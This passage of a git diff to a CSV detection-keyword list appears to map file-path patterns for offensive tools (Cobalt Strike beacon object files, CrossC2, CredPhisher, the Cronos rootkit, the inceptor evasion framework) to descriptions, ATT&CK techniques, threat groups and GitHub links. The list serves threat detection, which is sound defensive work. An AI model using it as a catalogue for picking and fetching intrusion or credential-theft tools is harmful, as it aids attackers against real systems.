T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - 
T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","154","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" "*/creditcards.py*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" -"*/CredPhisher/*","offensive_tool_keyword","CredPhisher","Prompts the current user for their credentials using the CredUIPromptForWindowsCredentials WinAPI function","T1056.002 - T1111","TA0004 ","N/A","N/A","Phishing","https://github.com/matterpreter/OffensiveCSharp/tree/master/CredPhisher","1","1","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" -"*/CredPrompt.exe*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - 
T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","153","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" -"*/CredPrompt/credprompt.c*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","153","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" -"*/creds-*/creds.zip*","offensive_tool_keyword","DefaultCreds-cheat-sheet","One place for all the default credentials to assist the Blue/Red teamers activities on finding devices with default password","T1110.001 - T1110.003","TA0006 - 
TA0007","N/A","N/A","Credential Access","https://github.com/ihebski/DefaultCreds-cheat-sheet","1","1","N/A","N/A","10","4664","610","2023-07-15T22:16:49Z","2021-01-01T19:02:36Z" +"*/CredPhisher/*","offensive_tool_keyword","CredPhisher","Prompts the current user for their credentials using the CredUIPromptForWindowsCredentials WinAPI function","T1056.002 - T1111","TA0004 ","N/A","N/A","Phishing","https://github.com/matterpreter/OffensiveCSharp/tree/master/CredPhisher","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*/CredPrompt.exe*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","154","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" +"*/CredPrompt/credprompt.c*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - 
T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","154","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" +"*/creds-*/creds.zip*","offensive_tool_keyword","DefaultCreds-cheat-sheet","One place for all the default credentials to assist the Blue/Red teamers activities on finding devices with default password","T1110.001 - T1110.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/ihebski/DefaultCreds-cheat-sheet","1","1","N/A","N/A","10","4666","610","2023-07-15T22:16:49Z","2021-01-01T19:02:36Z" "*/creds-summary.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/crlfinjection.txt*","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. 
Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","","N/A","","","" -"*/Cronos-Rootkit*","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","1","N/A","N/A","8","742","176","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z" +"*/Cronos-Rootkit*","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","1","N/A","N/A","8","744","176","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z" "*/CrossC2.*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard 
Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" "*/CrossC2/*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" "*/CrossC2Kit*","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. 
thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" 
@@ -3192,7 +3198,7 @@ "*/CS-BOFs/*","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","10","10","100","23","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z" "*/CSExec.py*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","1","private github repo","10","","N/A","","","" "*/CSExec.py.git*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","1","private github repo","10","","N/A","","","" -"*/csharp/process_injection/*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - 
TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*/csharp/process_injection/*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" "*/CSharpWinRM*","offensive_tool_keyword","cobaltstrike","C++ WinRM API via Reflective DLL","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mez-0/winrmdll","1","1","N/A","10","10","138","27","2021-09-11T13:44:16Z","2021-09-11T13:40:22Z" "*/C--Shellcode*","offensive_tool_keyword","cobaltstrike","python ShellCode Loader (Cobaltstrike&Metasploit)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - 
T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/OneHone/C--Shellcode","1","1","N/A","10","10","21","2","2019-11-28T01:53:55Z","2019-11-05T09:48:14Z" "*/CS-Loader.go*","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera 
- APT29","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","10","10","751","149","2021-08-11T06:43:52Z","2020-08-17T21:33:06Z" 
@@ -3200,7 +3206,7 @@ "*/csOnvps/*","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","277","68","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" "*/csOnvps/*","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. 
to solve the problem that cs4.x cannot run on Linux and report errors Gray often ginkgo design","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","277","68","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" "*/cs-rdll-ipc-example/*","offensive_tool_keyword","cobaltstrike","Example code for using named pipe output with beacon ReflectiveDLLs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - 
TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rxwx/cs-rdll-ipc-example","1","1","N/A","10","10","101","24","2020-06-24T19:47:35Z","2020-06-24T19:43:56Z" -"*/CS-Remote-OPs-BOF*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/CS-Remote-OPs-BOF*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - 
T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" "*/cs-token-vault/*","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
